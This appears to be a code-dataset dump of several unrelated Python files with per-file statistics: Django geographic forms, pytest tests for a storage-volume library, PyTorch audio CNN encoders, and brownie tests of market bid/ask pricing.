def test_enum4(self):
s1 = {"enum": [1, 2.0, 3]}
s2 = {"type": "integer"}
with self.subTest():
self.assertTrue(isSubschema(s1, s2))
with self.subTest():
self.assertFalse(isSubschema(s2, s1))
| 38.489736
| 195
| 0.535848
| 2,803
| 26,250
| 4.95041
| 0.046022
| 0.085327
| 0.159988
| 0.197175
| 0.930888
| 0.917411
| 0.887936
| 0.854785
| 0.828193
| 0.812266
| 0
| 0.049065
| 0.287238
| 26,250
| 681
| 196
| 38.546256
| 0.692571
| 0.014705
| 0
| 0.77931
| 0
| 0
| 0.17
| 0
| 0
| 0
| 0
| 0
| 0.256897
| 1
| 0.132759
| false
| 0
| 0.005172
| 0
| 0.144828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce2a5210be26ac16ba0265bf5eec10423ac7ecf8
| 7,713
|
py
|
Python
|
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
regions/forms.py
|
aliibsamohammed/django_country_location
|
88eb48d1a8b2375bbd239752b3bee6d5ce1274fc
|
[
"MIT"
] | null | null | null |
from django import forms
from .models import Continent, SubContinent, Country, State, City, Region, TimeZone
class TimeZoneCreateForm(forms.ModelForm):
class Meta:
model = TimeZone
fields = '__all__'
class ContinentCreateForm(forms.ModelForm):
class Meta:
model = Continent
fields = '__all__'
class SubContinentCreateForm(forms.ModelForm):
class Meta:
model = SubContinent
fields = '__all__'
class CountryCreateForm(forms.ModelForm):
class Meta:
model = Country
fields = '__all__'
class StateCreateForm(forms.ModelForm):
class Meta:
model = State
fields = '__all__'
class CityCreateForm(forms.ModelForm):
class Meta:
model = City
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['state'].queryset = State.objects.none()
if 'country' in self.data:
try:
country_id = int(self.data.get('country'))
self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
class RegionCreateForm(forms.ModelForm):
class Meta:
model = Region
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['sub_continent'].queryset = SubContinent.objects.none()
self.fields['country'].queryset = Country.objects.none()
self.fields['state'].queryset = State.objects.none()
self.fields['city'].queryset = City.objects.none()
if 'continent' in self.data:
try:
continent_id = int(self.data.get('continent'))
self.fields['subcontinent'].queryset = SubContinent.objects.filter(continent_id=continent_id).order_by('name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['subcontinent'].queryset = self.instance.continent.subcontinent_set.order_by('name')
if 'subcontinent' in self.data:
try:
subcontinent_id = int(self.data.get('subcontinent'))
self.fields['country'].queryset = Country.objects.filter(subcontinent_id=subcontinent_id).order_by('name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['country'].queryset = self.instance.subcontinent.country_set.order_by('name')
if 'country' in self.data:
try:
country_id = int(self.data.get('country'))
self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
if 'state' in self.data:
try:
state_id = int(self.data.get('state'))
self.fields['city'].queryset = City.objects.filter(state_id=state_id).order_by('city_name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['city'].queryset = self.instance.state.city_set.order_by('city_name')
class TimeZoneUpdateForm(forms.ModelForm):
class Meta:
model = TimeZone
fields = '__all__'
class ContinentUpdateForm(forms.ModelForm):
class Meta:
model = Continent
fields = '__all__'
class SubContinentUpdateForm(forms.ModelForm):
class Meta:
model = SubContinent
fields = '__all__'
class CountryUpdateForm(forms.ModelForm):
class Meta:
model = Country
fields = '__all__'
class StateUpdateForm(forms.ModelForm):
class Meta:
model = State
fields = '__all__'
class CityUpdateForm(forms.ModelForm):
class Meta:
model = City
fields = '__all__'
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['state'].queryset = State.objects.none()
if 'country' in self.data:
try:
country_id = int(self.data.get('country'))
self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['state'].queryset = self.instance.country.state_set.order_by('name')
"""
class RegionUpdateForm(forms.ModelForm):
class Meta:
model = Region
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['sub_continent'].queryset = SubContinent.objects.none()
self.fields['country'].queryset = Country.objects.none()
self.fields['state'].queryset = State.objects.none()
self.fields['city'].queryset = City.objects.none()
if 'continent' in self.data:
try:
continent_id = int(self.data.get('continent'))
self.fields['subcontinent'].queryset = SubContinent.objects.filter(continent_id=continent_id).order_by('name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['subcontinent'].queryset = self.instance.continent.subcontinent_set.order_by('name')
if 'subcontinent' in self.data:
try:
subcontinent_id = int(self.data.get('subcontinent'))
self.fields['country'].queryset = Country.objects.filter(subcontinent_id=subcontinent_id).order_by('name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['country'].queryset = self.instance.subcontinent.country_set.order_by('name')
if 'country' in self.data:
try:
country_id = int(self.data.get('country'))
self.fields['state'].queryset = State.objects.filter(country_id=country_id).order_by('state_name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['state'].queryset = self.instance.country.state_set.order_by('state_name')
if 'state' in self.data:
try:
state_id = int(self.data.get('state'))
self.fields['city'].queryset = City.objects.filter(state_id=state_id).order_by('city_name')
except (ValueError, TypeError):
pass # invalid input from the client; ignore and fallback to empty City queryset
elif self.instance.pk:
self.fields['city'].queryset = self.instance.state.city_set.order_by('city_name')
| 37.808824
| 126
| 0.627771
| 862
| 7,713
| 5.431555
| 0.081207
| 0.064075
| 0.056813
| 0.068774
| 0.924391
| 0.924391
| 0.924391
| 0.924391
| 0.924391
| 0.817172
| 0
| 0
| 0.259821
| 7,713
| 203
| 127
| 37.995074
| 0.820109
| 0.086218
| 0
| 0.889655
| 0
| 0
| 0.087058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02069
| false
| 0.062069
| 0.013793
| 0
| 0.227586
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ce3fd7c4623396b15cfc3a1242c0b0ad4cb50c90
| 7,777
|
py
|
Python
|
tests/test_get_volume_for_home.py
|
ifxit/nidho
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | 11
|
2016-06-09T12:07:14.000Z
|
2018-01-18T08:01:08.000Z
|
tests/test_get_volume_for_home.py
|
ifxit/nidho
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | 4
|
2016-07-06T11:06:34.000Z
|
2020-01-02T10:11:48.000Z
|
tests/test_get_volume_for_home.py
|
ifxit/nidhogg
|
7d49bb7d879d0f3d444df50f2c18c2cdf883216c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
from nidhogg.sevenmode import SevenMode
from nidhogg.clustermode import ClusterMode
cluster_ret_value = {
'attributes-list': {
'volume-attributes': [{
'volume-id-attributes': {
'name': "name11",
'type': "dp",
},
'volume-state-attributes': {'state': "online"},
'volume-space-attributes': {
"size-total": "120259084288",
"size-used": "9575825408",
"size-available": "110683258880",
},
'volume-inode-attributes': {
"files-total": "4358138",
"files-used": "14024",
}
}, {
'volume-id-attributes': {
'name': "name12",
'type': "rw",
},
'volume-state-attributes': {'state': "online"},
'volume-space-attributes': {
"size-total": "1202590842",
"size-used": "95758254",
"size-available": "1106832588",
},
'volume-inode-attributes': {
"files-total": "4358138",
"files-used": "14024",
}
}, {
'volume-id-attributes': {
'name': "name13",
'type': "rw",
},
'volume-state-attributes': {'state': "online"},
'volume-space-attributes': {
"size-total": "1202590842",
"size-used": "95758334",
"size-available": "1106832508",
},
'volume-inode-attributes': {
"files-total": "4358138",
"files-used": "14024",
}
}]
},
'num-records': '3'
}
seven_ret_value = {
'volumes': {
'volume-info': [{
'name': "name11",
'state': "online",
"size-total": "120259084288",
"size-used": "9575825408",
"size-available": "110683258880",
"files-total": "4358138",
"files-used": "14024",
"raid-status": "snapmirror",
}, {
'name': "name12",
'state': "online",
"size-total": "1202590842",
"size-used": "95758254",
"size-available": "1106832588",
"files-total": "4358138",
"files-used": "14024",
"raid-status": "ok",
}, {
'name': "name13",
'state': "online",
"size-total": "1202590842",
"size-used": "95758334",
"size-available": "1106832508",
"files-total": "4358138",
"files-used": "14024",
"raid-status": "ok",
}]
}
}
@pytest.mark.parametrize('mode', [
(ClusterMode, cluster_ret_value),
(SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_project(mode, monkeypatch):
def get_quota_size(*args, **kwargs):
return 12345.0
monkeypatch.setattr("nidhogg.core.Nidhogg.get_allocated_quota_size", get_quota_size)
def get_quota_ratio(*args, **kwargs):
return 0.1
monkeypatch.setattr("nidhogg.core.Nidhogg.get_allocated_quota_ratio", get_quota_ratio)
project_volumes = mode.get_volumes_with_quota_info(filter_volume_names=[])
assert project_volumes == [
# only online volumes with state = rw are returned
# {
# 'filer': u'my.url.to.filer',
# 'files_total': 4358138.0,
# 'files_used': 14024.0,
# 'name': 'name11',
# 'size_available': 110683258880.0,
# 'size_total': 120259084288.0,
# 'size_used': 9575825408.0,
# 'state': 'offline',
# 'snapable': False,
# 'quota_ratio': 0.1,
# 'quota_size': 12345.0,
# },
{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name12',
'size_available': 1106832588.0,
'size_total': 1202590842.0,
'size_used': 95758254.0,
'state': 'online',
'snapable': True,
'quota_ratio': 0.1,
'quota_size': 12345.0,
},
{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name13',
'size_available': 1106832508.0,
'size_total': 1202590842.0,
'size_used': 95758334.0,
'state': 'online',
'snapable': True,
'quota_ratio': 0.1,
'quota_size': 12345.0,
}]
@pytest.mark.parametrize('mode', [
(ClusterMode, cluster_ret_value),
(SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_project_with_filter(mode, monkeypatch):
def get_quota_size(*args, **kwargs):
return 12345.0
monkeypatch.setattr("nidhogg.core.Nidhogg.get_allocated_quota_size", get_quota_size)
def get_quota_ratio(*args, **kwargs):
return 0.1
monkeypatch.setattr("nidhogg.core.Nidhogg.get_allocated_quota_ratio", get_quota_ratio)
project_volumes = mode.get_volumes_with_quota_info(filter_volume_names=["name12"])
assert project_volumes == \
[{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name12',
'size_available': 1106832588.0,
'size_total': 1202590842.0,
'size_used': 95758254.0,
'state': 'online',
'snapable': True,
'quota_ratio': 0.1,
'quota_size': 12345.0,
}]
@pytest.mark.parametrize('mode', [
(ClusterMode, cluster_ret_value),
(SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_user(mode):
home_volumes = mode.get_volumes(filter_volume_names=[])
assert home_volumes == [
# only online volumes with state = rw are returned
# {
# 'filer': u'my.url.to.filer',
# 'files_total': 4358138.0,
# 'files_used': 14024.0,
# 'name': 'name11',
# 'size_available': 110683258880.0,
# 'size_total': 120259084288.0,
# 'size_used': 9575825408.0,
# 'state': 'offline',
# 'snapable': False,
# },
{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name12',
'size_available': 1106832588.0,
'size_total': 1202590842.0,
'size_used': 95758254.0,
'state': 'online',
'snapable': True,
},
{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name13',
'size_available': 1106832508.0,
'size_total': 1202590842.0,
'size_used': 95758334.0,
'state': 'online',
'snapable': True,
}]
@pytest.mark.parametrize('mode', [
(ClusterMode, cluster_ret_value),
(SevenMode, seven_ret_value)
], indirect=True)
def test_get_volume_for_user_with_filter(mode):
home_volumes = mode.get_volumes(filter_volume_names=['name12'])
assert home_volumes == \
[{
'filer': u'my.url.to.filer',
'files_total': 4358138.0,
'files_used': 14024.0,
'name': 'name12',
'size_available': 1106832588.0,
'size_total': 1202590842.0,
'size_used': 95758254.0,
'state': 'online',
'snapable': True,
}]
| 31.613821
| 90
| 0.501864
| 731
| 7,777
| 5.138167
| 0.128591
| 0.021299
| 0.063365
| 0.023429
| 0.903088
| 0.896699
| 0.896699
| 0.890841
| 0.879925
| 0.739617
| 0
| 0.139168
| 0.347692
| 7,777
| 245
| 91
| 31.742857
| 0.601222
| 0.090523
| 0
| 0.778894
| 0
| 0
| 0.282044
| 0.055216
| 0
| 0
| 0
| 0
| 0.020101
| 1
| 0.040201
| false
| 0
| 0.020101
| 0.020101
| 0.080402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
020ea8033963d2ba84debc0b7df4adade608b0d0
| 7,867
|
py
|
Python
|
models/sed_encoders.py
|
thomeou/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 4
|
2020-12-04T11:57:20.000Z
|
2022-03-12T15:23:03.000Z
|
models/sed_encoders.py
|
mammothb/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 3
|
2021-08-02T09:16:17.000Z
|
2021-12-15T13:24:13.000Z
|
models/sed_encoders.py
|
mammothb/General-network-architecture-for-sound-event-localization-and-detection
|
03b3aaccf3c87dd8fb857960e765ae768ad36625
|
[
"MIT"
] | 4
|
2021-01-23T10:18:46.000Z
|
2021-11-09T15:01:51.000Z
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from models.model_utils import ConvBlock, init_layer, _ResNet3, _ResNet, _ResnetBasicBlock
class PannCnn14L6(nn.Module):
"""
Derived from PANN CNN14 network. PannCnn14L6 has 6 CNN layers (3 convblock)
"""
def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
"""
:param n_input_channels: Number of input channels.
:param p_dropout: Dropout probability.
:param pretrained: If True, load pretrained model.
"""
super().__init__()
self.n_input_channels = n_input_channels
self.p_dropout = p_dropout
self.n_output_channels = 256
self.time_downsample_ratio = 8
self.freq_downsample_ratio = 8
self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
# Load pretrained model
self.load_pretrained_weight(pretrained=pretrained)
def load_pretrained_weight(self, pretrained: bool = False):
logger = logging.getLogger('lightning')
pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
if pretrained:
checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
try:
self.load_state_dict(checkpoint['model'], strict=False)
logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
except:
logger.info('WARNING: Coud not load pretrained weights from checkpoint {}.'.format(pretrained_path))
def forward(self, x):
"""
Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
"""
x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
return x
@property
def count_number_of_params(self):
n_params = sum([param.numel() for param in self.parameters()])
n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
return n_params, n_trainable_params
class PannCnn14L6F64(nn.Module):
"""
Derived from PANN CNN14 network. PannCnn14L6 has 6 CNN layers (3 convblock)
"""
def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
"""
:param n_input_channels: Number of input channels.
:param p_dropout: Dropout probability.
:param pretrained: If True, load pretrained model.
"""
super().__init__()
self.n_input_channels = n_input_channels
self.p_dropout = p_dropout
self.n_output_channels = 256
self.time_downsample_ratio = 8
self.freq_downsample_ratio = 64
self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
# Load pretrained model
self.load_pretrained_weight(pretrained=pretrained)
def load_pretrained_weight(self, pretrained: bool = False):
logger = logging.getLogger('lightning')
pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
if pretrained:
checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
try:
self.load_state_dict(checkpoint['model'], strict=False)
logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
except:
logger.info('WARNING: Coud not load pretrained weights from checkpoint {}.'.format(pretrained_path))
def forward(self, x):
"""
Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
"""
x = self.conv_block1(x, pool_size=(2, 4), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block2(x, pool_size=(2, 4), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block3(x, pool_size=(2, 4), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
return x
@property
def count_number_of_params(self):
n_params = sum([param.numel() for param in self.parameters()])
n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
return n_params, n_trainable_params
class PannCnn14L8(nn.Module):
"""
Derived from PANN CNN14 network. PannCnn14L8 has 8 CNN layers (4 convblock)
"""
def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.2, pretrained: bool = False, **kwargs):
"""
:param n_input_channels: Number of input channels.
:param p_dropout: Dropout probability.
:param pretrained: If True, load pretrained model.
"""
super().__init__()
self.n_input_channels = n_input_channels
self.p_dropout = p_dropout
self.n_output_channels = 512
self.time_downsample_ratio = 16
self.freq_downsample_ratio = 16
self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
self.conv_block2 = ConvBlock(in_channels=64, out_channels=128)
self.conv_block3 = ConvBlock(in_channels=128, out_channels=256)
self.conv_block4 = ConvBlock(in_channels=256, out_channels=512)
# Load pretrained model
self.load_pretrained_weight(pretrained=pretrained)
def load_pretrained_weight(self, pretrained: bool = False):
logger = logging.getLogger('lightning')
pretrained_path = '../pretrained_models/Cnn14_DecisionLevelAtt_mAP=0.425.pth'
if pretrained:
checkpoint = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
try:
self.load_state_dict(checkpoint['model'], strict=False)
logger.info('Load pretrained weights from checkpoint {}.'.format(pretrained_path))
except:
logger.info('WARNING: Coud not load pretrained weights from checkpoint {}.'.format(pretrained_path))
def forward(self, x):
"""
Input x: (batch_size, n_channels, n_timesteps/n_frames, n_features/n_freqs)
"""
x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
x = self.conv_block4(x, pool_size=(2, 2), pool_type='avg')
x = F.dropout(x, p=self.p_dropout, training=self.training)
return x
@property
def count_number_of_params(self):
n_params = sum([param.numel() for param in self.parameters()])
n_trainable_params = sum(param.numel() for param in self.parameters() if param.requires_grad)
return n_params, n_trainable_params
if __name__ == '__main__':
encoder = PannCnn14L8()
print(encoder.count_number_of_params)
print(encoder)
| 42.989071
| 116
| 0.663785
| 1,031
| 7,867
| 4.812803
| 0.123181
| 0.03547
| 0.042322
| 0.020153
| 0.915357
| 0.915357
| 0.915357
| 0.908303
| 0.908303
| 0.908303
| 0
| 0.027366
| 0.228931
| 7,867
| 182
| 117
| 43.225275
| 0.790636
| 0.120122
| 0
| 0.805085
| 0
| 0
| 0.084181
| 0.025568
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101695
| false
| 0
| 0.050847
| 0
| 0.228814
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02575a747344b075c67ae4cbf89816c194cb3401
| 5,768
|
py
|
Python
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 3
|
2022-02-17T16:11:39.000Z
|
2022-03-10T23:46:19.000Z
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 10
|
2022-01-25T21:49:20.000Z
|
2022-03-31T00:32:29.000Z
|
tests/markets/test_price.py
|
overlay-market/v1-core
|
e18fabd242f21c243a555712d3f08ca059941f41
|
[
"MIT"
] | 2
|
2022-01-21T01:04:54.000Z
|
2022-02-23T08:38:20.000Z
|
from brownie import reverts
from brownie.test import given, strategy
from decimal import Decimal
from math import exp
from pytest import approx
from .utils import RiskParameter
def test_bid_adds_static_spread(market, rando):
# params idx for delta param
idx = RiskParameter.DELTA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx) / 1e18)
# use zero volume so no market impact
volume = 0
# bids get the lower of micro/macro prices (worse price), multiplied
# by additional spread e^(-delta)
expect_bid = int(min(price_micro, price_macro) * exp(-delta))
actual_bid = int(market.bid(data, volume))
assert actual_bid == approx(expect_bid)
@given(
volume=strategy('decimal', min_value='0.0001', max_value='1.0000',
places=4))
def test_bid_adds_market_impact(market, volume, rando):
# params idx for delta, lmbda params
idx_delta = RiskParameter.DELTA.value
idx_lmbda = RiskParameter.LMBDA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx_delta) / 1e18)
lmbda = Decimal(market.params(idx_lmbda) / 1e18)
# use volume anywhere from 0.1% to 100% of the cap
input_volume = volume * Decimal(1e18)
# bids get the lower of micro/macro prices (worse price), multiplied
# by additional spread e^(-delta-lmbda*volume)
expect_bid = int(min(price_micro, price_macro) * exp(-delta-lmbda*volume))
actual_bid = int(market.bid(data, input_volume))
assert actual_bid == approx(expect_bid)
def test_bid_reverts_when_slippage_greater_than_max(market, rando):
# params idx for delta, lmbda params
idx_delta = RiskParameter.DELTA.value
idx_lmbda = RiskParameter.LMBDA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx_delta) / 1e18)
lmbda = Decimal(market.params(idx_lmbda) / 1e18)
# use volume greater than max slippage
tol = 1e-4 # tolerance put at +/- 1bps
max_pow = 20
max_volume = (max_pow - delta) / lmbda
# check reverts when volume produces slippage greater than max
volume = Decimal(max_volume) * Decimal(1 + tol)
input_volume = volume * Decimal(1e18)
with reverts("OVLV1:slippage>max"):
market.bid(data, input_volume)
# check does not revert when volume produces slippage about equal to max
volume = Decimal(max_volume) * Decimal(1 - tol)
input_volume = volume * Decimal(1e18)
_ = market.bid(data, input_volume)
def test_ask_adds_static_spread(market, rando):
# params idx for delta param
idx = RiskParameter.DELTA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx) / 1e18)
# use zero volume so no market impact
volume = 0
# asks get the higher of micro/macro prices (worse price), multiplied
# by additional spread e^(+delta)
expect_ask = int(max(price_micro, price_macro) * exp(delta))
actual_ask = int(market.ask(data, volume))
assert actual_ask == approx(expect_ask)
@given(
volume=strategy('decimal', min_value='0.0001', max_value='1.0000',
places=4))
def test_ask_adds_market_impact(market, volume, rando):
# params idx for delta, lmbda params
idx_delta = RiskParameter.DELTA.value
idx_lmbda = RiskParameter.LMBDA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx_delta) / 1e18)
lmbda = Decimal(market.params(idx_lmbda) / 1e18)
# use volume anywhere from 0.1% to 100% of the cap
input_volume = volume * Decimal(1e18)
# asks get the higher of micro/macro prices (worse price), multiplied
# by additional spread e^(delta+lmbda*volume)
expect_ask = int(max(price_micro, price_macro) * exp(delta+lmbda*volume))
actual_ask = int(market.ask(data, input_volume))
assert actual_ask == approx(expect_ask)
def test_ask_reverts_when_impact_greater_than_max_slippage(market, rando):
# params idx for delta, lmbda params
idx_delta = RiskParameter.DELTA.value
idx_lmbda = RiskParameter.LMBDA.value
# get the price data from call to update. update tests in test_update.py
tx = market.update({"from": rando})
data = tx.return_value
_, _, _, price_micro, price_macro, _, _, _ = data
delta = Decimal(market.params(idx_delta) / 1e18)
lmbda = Decimal(market.params(idx_lmbda) / 1e18)
# use volume greater than max slippage
tol = 1e-4 # tolerance put at +/- 1bps
max_pow = 20
max_volume = (max_pow - delta) / lmbda
# check reverts when volume produces slippage greater than max
volume = Decimal(max_volume) * Decimal(1 + tol)
input_volume = volume * Decimal(1e18)
with reverts("OVLV1:slippage>max"):
market.ask(data, input_volume)
# check does not revert when volume produces slippage about equal to max
volume = Decimal(max_volume) * Decimal(1 - tol)
input_volume = volume * Decimal(1e18)
_ = market.ask(data, input_volume)
| 35.604938
| 78
| 0.693135
| 809
| 5,768
| 4.745365
| 0.121137
| 0.046887
| 0.039073
| 0.052097
| 0.930451
| 0.916905
| 0.897109
| 0.856473
| 0.856473
| 0.847617
| 0
| 0.021472
| 0.208738
| 5,768
| 161
| 79
| 35.826087
| 0.819676
| 0.277739
| 0
| 0.73913
| 0
| 0
| 0.023712
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.065217
| false
| 0
| 0.065217
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02845a53a449853263d1c4027f9f764717630cb4
| 84
|
py
|
Python
|
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | 5
|
2018-04-24T11:44:53.000Z
|
2020-01-02T05:58:30.000Z
|
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | null | null | null |
Exp_upload/setup.py
|
Jwy-Leo/Tool
|
bc02a2c1b450d41a2505d61551e9959359d8640b
|
[
"MIT"
] | null | null | null |
import os
os.system('pip install gspread')
os.system('pip install oauth2client')
| 21
| 38
| 0.75
| 12
| 84
| 5.25
| 0.583333
| 0.253968
| 0.349206
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.130952
| 84
| 3
| 39
| 28
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0.530864
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
65ef882c93b299f38ff422cc6fe44f8f13737371
| 12,649
|
py
|
Python
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 715
|
